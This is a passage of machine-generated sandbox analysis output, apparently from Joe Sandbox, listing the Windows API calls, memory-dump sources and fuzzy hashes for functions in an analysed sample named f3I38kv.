                                                            • Instruction ID: 18f7668a6bc39d2a5b1ef9e9e500c7581230caa62cc9032ea255ba2e88deec23
                                                            • Opcode Fuzzy Hash: f573108528189bbeffc839c8b487fbc45e5ac464a27726f28efa8778eea4b1db
                                                            • Instruction Fuzzy Hash: 894149B0905B45DEE724CF798885AE7FBE5BF19300F50492ED6EE83282CB356654CB14
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F13E1
                                                              • Part of subcall function 004F5E37: __EH_prolog.LIBCMT ref: 004F5E3C
                                                              • Part of subcall function 004FCE40: __EH_prolog.LIBCMT ref: 004FCE45
                                                              • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 2d4fc16dcddba5ea606fd47b8bafe22745f319802ecd010c6557e28b15f2f2e4
                                                            • Instruction ID: df61f4a58e8145e09481547f654b9642a3bd8389658ceb8de51b4b5604609661
                                                            • Opcode Fuzzy Hash: 2d4fc16dcddba5ea606fd47b8bafe22745f319802ecd010c6557e28b15f2f2e4
                                                            • Instruction Fuzzy Hash: 184158B0905B45AEE724CF798885AE7FBE5BF19300F50492ED6FE83282CB352654CB14
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0050B098
                                                              • Part of subcall function 004F13DC: __EH_prolog.LIBCMT ref: 004F13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 01d887816e1edc247e3d821787f31601d4798915ce10aacf926f563f95d9eaf6
                                                            • Instruction ID: 8bc1dba61dd58066f5f013f4983f03c648ffe130a704bb68a574ee20a934039c
                                                            • Opcode Fuzzy Hash: 01d887816e1edc247e3d821787f31601d4798915ce10aacf926f563f95d9eaf6
                                                            • Instruction Fuzzy Hash: CC316C75800249DAEB15DF65C9919FEBBB4BF09304F10449EE409B7292D779AE04CB61
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0051ACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 23dd5743436636d494b83cf7205470442d11d70770ef5ddb48c23e05ed3ade34
                                                            • Instruction ID: 78c09120e494198d6ef8cf0b4880f1d4a14df18ffa085ccb396deba64bc6e296
                                                            • Opcode Fuzzy Hash: 23dd5743436636d494b83cf7205470442d11d70770ef5ddb48c23e05ed3ade34
                                                            • Instruction Fuzzy Hash: 54110633A02A255FBB339E28EC418DA7B95FF8532471A4620FC15AB254E730DC8697D2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 01325629bdfbb01b47ddb35a39149ddc6fe6b652a569abb058a60a8010071c38
                                                            • Instruction ID: 289006923ffadc4fded75789038adf43ccbbcb2ee68d8f7b260febc18449ad34
                                                            • Opcode Fuzzy Hash: 01325629bdfbb01b47ddb35a39149ddc6fe6b652a569abb058a60a8010071c38
                                                            • Instruction Fuzzy Hash: 1001A933D0052CABCF11AB69CD81AEEB776BF88744F01455AEA15B7252DA38CD04C6A4
                                                            APIs
                                                              • Part of subcall function 0051B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00519813,00000001,00000364,?,00513F73,00000050,?,00531030,00000200), ref: 0051B177
                                                            • _free.LIBCMT ref: 0051C4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: 98754d8c91dd6a20a09a3a97d4f139384dde084fdff0cd4c11c428bb7ba4db91
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: CD0126722443066BF7318E659885DAAFFE9FBC5330F250A1DE18483281EA71A885C724
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00519813,00000001,00000364,?,00513F73,00000050,?,00531030,00000200), ref: 0051B177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 1fc28d0106f0ec85f16d1b1c62ded881140e259dcdeb61d054f6e57eb4dcbc3a
                                                            • Instruction ID: e56e79891232b1ceb6289cf38cdae3e16e300c5529c6ee3d549802f8a123ba04
                                                            • Opcode Fuzzy Hash: 1fc28d0106f0ec85f16d1b1c62ded881140e259dcdeb61d054f6e57eb4dcbc3a
                                                            • Instruction Fuzzy Hash: A5F0B432585225B7FB215A21AC29BDF7F48BF81760F1A8111BC089A1A0CB60DD81C2E1
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00513C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: e2e3851cdc8087a45c912467f6b294c148f98fd7d8f8846e5b7869d55db2795b
                                                            • Instruction ID: ba837ce6a8bdf7346d9377576ee458234691fe3b814a392f8bbd4396ce2450fb
                                                            • Opcode Fuzzy Hash: e2e3851cdc8087a45c912467f6b294c148f98fd7d8f8846e5b7869d55db2795b
                                                            • Instruction Fuzzy Hash: 31F08C323042179FEF119EA8EC289DA7BA9BF41B25B104124FA05E6190EB31DEA0D7D0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0051CA2C,00000000,?,00516CBE,?,00000008,?,005191E0,?,?,?), ref: 00518E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7c7eaffe9f6140bbe1d1d9e21039ac6a6042f0ffc6699a08aae8f7c446ec24e0
                                                            • Instruction ID: 38d4b53ecb74b61278904e51f5083607e4224cb05f3442da495ec46cfb1d7701
                                                            • Opcode Fuzzy Hash: 7c7eaffe9f6140bbe1d1d9e21039ac6a6042f0ffc6699a08aae8f7c446ec24e0
                                                            • Instruction Fuzzy Hash: 1EE06D3520622666FB7126659C09BFB7F4DBF927A4F150321AC18DA191CF20DCC192E1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F5AC2
                                                              • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 3a0e21f5bf23a49e2e5c105d5fba083f707be84d918daa6b93616e5b92bd667f
                                                            • Instruction ID: 5ccb9c1258cd341e383a42eafbb83a4fb9e0496f548165e29825fc0026b22d41
                                                            • Opcode Fuzzy Hash: 3a0e21f5bf23a49e2e5c105d5fba083f707be84d918daa6b93616e5b92bd667f
                                                            • Instruction Fuzzy Hash: 8E01DC70808695DAD724EBB8C0097EDFBE4EFA4308F50848EA456532C2CBB51B08D7A2
                                                            APIs
                                                              • Part of subcall function 004FA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA6C4
                                                              • Part of subcall function 004FA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA6F2
                                                              • Part of subcall function 004FA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 5500bc37c8b6a369c5a99cb472ddad759b4b8a150a77ade2b6d38bc79e1d0b90
                                                            • Instruction ID: d4d28e9f08d14610276c56828e033b7a78656c24031f31182b7cccc59d91e8e2
                                                            • Opcode Fuzzy Hash: 5500bc37c8b6a369c5a99cb472ddad759b4b8a150a77ade2b6d38bc79e1d0b90
                                                            • Instruction Fuzzy Hash: 59F0E271008394AACB2257B48804BEB7BD06F1A335F048A4FF2FD52296C37910A99B37
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00500E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 46af90b39987c338908f9a320a345f60e8bca3286b67ac08a9e39d584ec9a8b1
                                                            • Instruction ID: 552110591e0bfca8fa5e64fdfc640abe723e3b4c914942cee22262398adfac87
                                                            • Opcode Fuzzy Hash: 46af90b39987c338908f9a320a345f60e8bca3286b67ac08a9e39d584ec9a8b1
                                                            • Instruction Fuzzy Hash: D1D0C21060109956DB353339685E7FE2E0AAFD6710F0D002AB185672C2CB480886A26A
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0050A62C
                                                              • Part of subcall function 0050A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0050A3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: dc2990593fc10869b968f2ef9983d3fb16fe1069f6bbafafd16125baab013706
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 8FD0C97161030ABADF426B718C1BAAE7EA9FB40340F148925BD42D51D1EAB2D910A662
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00501B3E), ref: 0050DD92
                                                              • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                                              • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                                              • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010424,?), ref: 0050B59E
                                                              • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                                              • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: e9c5e7bb4d9428bc56ee80428123dfc954102040cbd0ed8dd0df1ba41269b944
                                                            • Instruction ID: a25a280d509a0fa342991475331295f2ba2536b1aee545b901a9a2ab480082e6
                                                            • Opcode Fuzzy Hash: e9c5e7bb4d9428bc56ee80428123dfc954102040cbd0ed8dd0df1ba41269b944
                                                            • Instruction Fuzzy Hash: 6CD09E31144301BADA022B51CD0AF1E7AA2BB98B09F004554B284740F18A729D25EB11
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 0050E5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: a15524c221a7eda47181ecfe4a09c37a9e3e08e86245841c0c1af9398c74ae09
                                                            • Instruction ID: 65f3b467a4c40e7e940227454ac0ed8a107b533deefbca576932ce475263842f
                                                            • Opcode Fuzzy Hash: a15524c221a7eda47181ecfe4a09c37a9e3e08e86245841c0c1af9398c74ae09
                                                            • Instruction Fuzzy Hash: 94D0A9B00C06808AC22AEFA8AC5B71C3E60B730702FB00E01B104811D0DB624888A60D
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,004F97BE), ref: 004F98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 384a2b4c2a51a076ef30ae197247dbf58f4e41f66203b45841ddce53227e6edd
                                                            • Instruction ID: cbd4227e22ca7200090e841f90c26c6343974bca81c77d2d10f084f502424684
                                                            • Opcode Fuzzy Hash: 384a2b4c2a51a076ef30ae197247dbf58f4e41f66203b45841ddce53227e6edd
                                                            • Instruction Fuzzy Hash: 63C0123441010985CE34A62498481A67311AF533E57B48696C128852A1C32BCC8BEA14
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6bf392bf96c4f7da1e2238120ee4d449e62eaa83c7afcb37cff2183c45ad6f65
                                                            • Instruction ID: 45c6100ce91e59079678e81ad7a9baea07f7a9bd7e3513cccc0f9c2ced1c45e4
                                                            • Opcode Fuzzy Hash: 6bf392bf96c4f7da1e2238120ee4d449e62eaa83c7afcb37cff2183c45ad6f65
                                                            • Instruction Fuzzy Hash: 6CB092A2259111ACA2049108281BC3F0E49FAC1B21330CC2AF818C10C1D84068090432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2f9c6cd2de4440bbe5c5763f6b0c89e73720bff1f77ac17a82f1b0321415f85e
                                                            • Instruction ID: 30b06b9e5f91b87247bf05549580765d07eb3106b58152e581f053b165fe5738
